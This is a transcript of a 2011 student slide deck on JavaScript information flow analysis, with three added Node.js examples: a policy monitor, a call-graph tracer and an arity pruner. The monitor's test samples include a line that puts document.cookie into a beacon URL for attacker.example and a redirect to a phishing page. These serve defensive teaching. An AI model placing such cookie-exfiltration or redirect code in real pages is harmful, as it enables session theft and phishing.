JavaScript Information Flow Analysis


TRANSCRIPT

Page 1: JavaScript Information Flow Analysis

Fall, 2011 - Privacy&Security - Virginia Tech – Computer Science

JavaScript Information Flow Analysis

Shiyi Wei, CS6204 term project

Page 2: JavaScript Information Flow Analysis

Overview

• Project motivation
• Literature review
  – Paper organization
  – Selected papers
  – Observations
• Framework overview
• Analysis components
• On-going work & conclusion

Page 3: JavaScript Information Flow Analysis

Project Motivation

• Jif: Java information flow
  – Type-based approach
  – Language extension
  – Imprecise
• Java programming language
  – Static typing
  – Class hierarchy

Page 4: JavaScript Information Flow Analysis

Project Motivation

• Information flow analysis for JavaScript
  – Does the type-based approach still work? JavaScript is dynamically typed
• Challenges
  – Dynamic language features
    – Prototyping
    – Dynamic code generation
    – Variadic functions
    – Fields
  – Benchmark

Page 5: JavaScript Information Flow Analysis

Literature Review

Paper categories
• Information flow analysis for C, C++, and Java
• Analyzing dynamic languages
  – Performance
  – Correctness
• Security analysis of JavaScript
  – Static analysis
  – Dynamic analysis

Page 6: JavaScript Information Flow Analysis

Literature Review

GATEKEEPER [1]: policy enforcement for JavaScript widgets
• JavaScript_SAFE: the language subset whose policies are enforced purely statically
• JavaScript_GK: a larger subset whose additional constructs need dynamic (runtime) checks

References
[1] S. Guarnieri and B. Livshits. GATEKEEPER: Mostly static enforcement of security and reliability policies for JavaScript code. In Proceedings of the 18th USENIX Security Symposium, 2009, pp. 151–168.

Page 7: JavaScript Information Flow Analysis

Literature Review

Staged information flow for JavaScript [2]
• Integrity policy: the code loaded at any eval site must not flow into the value of document.location
• Confidentiality policy: the value of document.cookie must not flow into any variable within the code loaded at any eval site
• Staged information flow
  – Stage 1: analyze the statically known code and compute, for each eval site, the residual policy that code loaded there must satisfy
  – Stage 2: when code actually arrives at an eval site, check it against that residual policy

References
[2] R. Chugh, J. A. Meister, R. Jhala, and S. Lerner. Staged information flow for JavaScript. In Proceedings of the 2009 ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI), 2009.
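The two policies on this slide, enforced at run time by an added example that is not part of the slides and not code from the staged-information-flow system. It assumes Node.js and a constructed stand-in for the browser's document object; makeMonitoredDocument, checkedEval and the sample code strings are this example's own names. Staged information flow checks the loaded code statically before it runs; the Proxy-based monitor below only sees the paths that actually execute and only catches a direct read of document.cookie or a direct write to document.location, not a flow that goes through control dependence.

```javascript
// Added example, not from the slides or from the staged-information-flow paper [2]:
// a runtime monitor for the two policies, for Node.js, using a constructed
// stand-in for the browser's `document`.
//   integrity:       code loaded at an eval site must not flow into document.location
//   confidentiality: document.cookie must not flow into a variable of eval-loaded code
// Staged information flow checks these statically before the loaded code runs; this
// monitor instead wraps `document` in a Proxy and watches what the loaded code does.

function makeMonitoredDocument(realDoc, violations) {
  return new Proxy(realDoc, {
    get(target, prop) {
      if (prop === 'cookie') {
        // The secret is about to be bound to a variable inside eval-loaded code.
        violations.push('confidentiality: document.cookie read by eval-loaded code');
        return '';                          // hand back a dummy instead of the secret
      }
      return target[prop];
    },
    set(target, prop, value) {
      if (prop === 'location') {
        // A value computed by eval-loaded code is about to become the navigation target.
        violations.push(`integrity: eval-loaded code tried to set document.location to ${value}`);
        return true;                        // swallow the write
      }
      target[prop] = value;
      return true;
    },
  });
}

// Run `code` as if it were loaded at an eval site, with the monitored document in
// scope. Returns the violations observed (an empty array means the code was clean).
function checkedEval(code, realDoc) {
  const violations = [];
  // The host page may already have leaked the cookie into the code string itself,
  // e.g. eval("var c = '" + document.cookie + "'"); a substring check catches that.
  if (realDoc.cookie && code.includes(realDoc.cookie)) {
    violations.push('confidentiality: cookie value embedded in the loaded code string');
  }
  const monitored = makeMonitoredDocument(realDoc, violations);
  // `new Function` compiles the code in global scope with our proxy bound to `document`.
  const loaded = new Function('document', code);
  try {
    loaded(monitored);
  } catch (e) {
    violations.push(`runtime error in loaded code: ${e.message}`);
  }
  return violations;
}

// Constructed stand-in for the browser document (there is no DOM in Node.js).
function freshDocument() {
  return { cookie: 'session=abc123', location: 'https://example.com/', title: 'home' };
}

// Constructed samples of code arriving at an eval site.
const CLEAN    = "var t = document.title; document.title = t + ' (loaded)';";
const LEAK     = "var c = document.cookie; var beacon = 'https://attacker.example/?c=' + c;";
const REDIRECT = "document.location = 'https://attacker.example/phish';";

console.log(checkedEval(CLEAN, freshDocument()));     // []
console.log(checkedEval(LEAK, freshDocument()));      // one confidentiality violation
console.log(checkedEval(REDIRECT, freshDocument()));  // one integrity violation
```

The substring check in checkedEval is the closest a purely dynamic monitor gets to the "flow into the loaded code" half of the confidentiality policy; the static stage of the paper's approach answers that question for every eval site without having to see the secret's value.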

Page 8: JavaScript Information Flow Analysis

Literature Review

JavaScript taint analysis [3]
• Prototypes
• Object creations
• Reflective property accesses
• Lexical scoping

References
[3] S. Guarnieri, M. Pistoia, O. Tripp, J. Dolby, S. Teilhet, and R. Berg. Saving the world wide web from vulnerable JavaScript. In Proceedings of the 2011 International Symposium on Software Testing and Analysis (ISSTA), 2011.

Page 9: JavaScript Information Flow Analysis

Literature Review

Observations
• Existing analyses handle only a limited set of language features
  – Prototypes [2, 4]
  – Property deletion
  – eval
• Experimental design
  – The standard JavaScript benchmark suites are not representative of real web sites [5]

References
[4] A. Guha, S. Krishnamurthi, and T. Jim. Using static analysis for Ajax intrusion detection. In Proceedings of the International Conference on World Wide Web (WWW), 2009.
[5] G. Richards, S. Lebresne, B. Burg, and J. Vitek. An analysis of the dynamic behavior of JavaScript programs. In Proceedings of the 2010 ACM SIGPLAN Conference on Programming Language Design and Implementation (PLDI), 2010.

Page 10: JavaScript Information Flow Analysis

Framework Overview

(diagram) Two inputs feed the static analysis infrastructure:

  Website source ------------------------------------------------> Static analysis infrastructure
  Instrumented WebKit --(call graph + dynamically generated code)--> Static analysis infrastructure

Page 11: JavaScript Information Flow Analysis

Analysis Components

Instrumented WebKit: TracingSafari [5]
• Instrumented code
  – Function calls
    – Method signature
    – Arguments
  – Object creation sites
  – Dynamically generated code
    – eval
    – document.write
    – etc.

Page 12: JavaScript Information Flow Analysis

Analysis Components

Static infrastructure: WALA
• IBM T.J. Watson Libraries for Analysis
• Extract JavaScript code
  – From web site source
• Import dynamic information
  – Dynamic call graph
  – Dynamically generated code
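The dynamic side of the framework on the two preceding slides (function calls with their arguments, object creation sites, dynamically generated code from eval and document.write, imported as a dynamic call graph and extra code) as an added example for Node.js. It is not part of the slides and is not TracingSafari or WALA code: TracingSafari records these events inside the engine, while this sketch does it at the JavaScript level with wrapper functions, a constructed document stand-in, and a constructed sample page. makeTracer, instrument, create, tracedFunction and runSamplePage are this example's own names.

```javascript
// Added example, not from the slides and not TracingSafari or WALA code: a
// JavaScript-level sketch of the dynamic side of the framework, for Node.js.
// It records (1) function calls with callee name and argument count, as edges
// of a dynamic call graph, (2) object creation sites, and (3) dynamically
// generated code, captured from the Function constructor and from a constructed
// stand-in for document.write, whose written HTML is scanned for inline <script>
// bodies so a static analysis can be handed code it would otherwise never see.

function makeTracer() {
  const trace = { calls: [], edges: new Set(), creations: [], dynamicCode: [] };
  const stack = ['<toplevel>'];               // chain of currently executing instrumented functions
  const current = () => stack[stack.length - 1];

  // Wrap every function-valued property of `obj` so each call logs a caller -> callee edge.
  function instrument(obj, prefix) {
    for (const key of Object.keys(obj)) {
      const orig = obj[key];
      if (typeof orig !== 'function') continue;
      const name = `${prefix}.${key}`;
      obj[key] = function (...args) {
        trace.calls.push({ callee: name, argc: args.length, caller: current() });
        trace.edges.add(`${current()} -> ${name}`);
        stack.push(name);
        try { return orig.apply(this, args); } finally { stack.pop(); }
      };
    }
    return obj;
  }

  // Record an allocation site; `site` is a label the instrumented code passes in.
  function create(site, obj) {
    trace.creations.push({ site, ctor: obj.constructor.name, in: current() });
    return obj;
  }

  // Stand-in for hooking eval/Function: log the source, then really compile it.
  function tracedFunction(...args) {
    trace.dynamicCode.push({ via: 'Function', source: args[args.length - 1], in: current() });
    return Function(...args);
  }

  // Constructed document stand-in. document.write is itself instrumented below, so
  // inside it current() is 'document.write' and the entry beneath is the generating function.
  const document = {
    written: '',
    write(html) {
      this.written += html;
      for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
        trace.dynamicCode.push({ via: 'document.write', source: m[1].trim(), in: stack[stack.length - 2] });
      }
    },
  };
  instrument(document, 'document');
  return { trace, instrument, create, tracedFunction, document };
}

// Constructed sample page, written as it would look after instrumentation.
function runSamplePage() {
  const T = makeTracer();
  const app = T.instrument({
    load(url) { return T.create('app.load', { url }); },
    render(item, id) { T.document.write('<p>' + item + '</p><script>track(' + id + ')</script>'); },
  }, 'app');
  T.document.write('<div>static markup</div>');   // no script inside: nothing captured
  app.load('/api/items');
  app.render('hello', 42);                          // generates track(42) via document.write
  const add = T.tracedFunction('a', 'b', 'return a + b');
  return { trace: T.trace, sum: add(1, 2) };
}

const result = runSamplePage();
console.log([...result.trace.edges]);   // 4 call-graph edges
console.log(result.trace.dynamicCode);  // track(42) from document.write, return a + b from Function
```

Engine-level instrumentation sees every call and every direct eval regardless of how the page is written; this wrapper version only sees functions it was handed, and the regular expression that pulls out inline scripts stands in for the HTML parser a real extractor would use.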

Page 13: JavaScript Information Flow Analysis

Analysis Components

Static infrastructure: handling JavaScript language features
• Variadic functions
  – Method definitions + arguments
  – Pruning with arguments.length
  – Seen on twitter.com, amazon.com, msn.com, …
• Dynamic code generation

    function F(a, b)
    {
      if (arguments.length === 1)
      {…}
      else if (arguments.length === 2)
      {…}
      else if (arguments.length >= 3)
      {…}
    }
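What pruning with arguments.length means for the call graph, as an added example that is not from the slides: the overloaded F above with its branches made observable, a pruner that keeps only the branches a call site can reach, and the runtime facts that decide when that pruning is sound. It assumes Node.js; feasibleBranches, pruneCallEdges, arityFacts and the call-site records are this example's own, constructed names.

```javascript
// Added example, not from the slides: pruning call-graph edges for an
// arguments.length-dispatched function, and the runtime facts that decide
// when such pruning is sound. Node.js; the call-site records are constructed.

// The overloaded function from the slide, with each branch made observable.
function F(a, b) {
  if (arguments.length === 1) return 'one';
  if (arguments.length === 2) return 'two';
  if (arguments.length >= 3) return 'three+';
  return undefined;                     // falls off the end for zero arguments
}

// The branches of F keyed on the argument count they test for.
const F_BRANCHES = [
  { label: 'one',    feasible: n => n === 1 },
  { label: 'two',    feasible: n => n === 2 },
  { label: 'three+', feasible: n => n >= 3 },
];

// A call site as the analysis sees it: the number of argument expressions, and
// whether that number is fixed by the syntax (F(x, y)) or only known at run time
// (F.apply(o, arr), F(...arr)). Returns the branch labels that stay feasible.
function feasibleBranches(site) {
  if (site.dynamicArity) return F_BRANCHES.map(b => b.label);   // nothing can be pruned
  return F_BRANCHES.filter(b => b.feasible(site.argc)).map(b => b.label);
}

// Build the pruned call-graph edges site -> F#branch for a list of call sites.
function pruneCallEdges(sites) {
  const edges = [];
  for (const s of sites) {
    for (const label of feasibleBranches(s)) edges.push(`${s.id} -> F#${label}`);
  }
  return edges;
}

// Runtime facts an analysis must respect when it counts arguments at a call site.
function arityFacts() {
  return {
    declared: F.length,                     // 2: declared parameters, not what was passed
    explicitUndefined: F(1, undefined),     // 'two': an explicit undefined still counts
    viaApply: F.apply(null, [1, 2, 3]),     // 'three+': the count comes from the array, not the syntax
    viaSpread: F(...[1]),                   // 'one': likewise
    noArgs: F(),                            // undefined: no branch matches
  };
}

// Constructed call sites.
const SITES = [
  { id: 'site1', argc: 1 },                      // F(x)
  { id: 'site2', argc: 2 },                      // F(x, undefined) still has argc 2
  { id: 'site3', argc: 1, dynamicArity: true },  // F.apply(null, arr): one expression, unknown count
];

console.log(pruneCallEdges(SITES));   // 5 edges: site1 and site2 resolve to one branch each, site3 keeps all three
console.log(arityFacts());
```

The pruner counts argument expressions at the call site, not non-undefined values, because that is what arguments.length reports; and it gives up on apply, call-with-spread and any other site where the count is data rather than syntax, since pruning there would silently drop reachable code from the call graph.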

Page 14: JavaScript Information Flow Analysis

On-going Work & Conclusion

On-going work
• Information flow algorithm
• Benchmark
• Handle other language features
  – Prototyping, etc.

Conclusion
• Literature review: JavaScript information flow is hard
  – Dynamic language features
• Blended (static + dynamic) approach
  – Works on the unsolved issues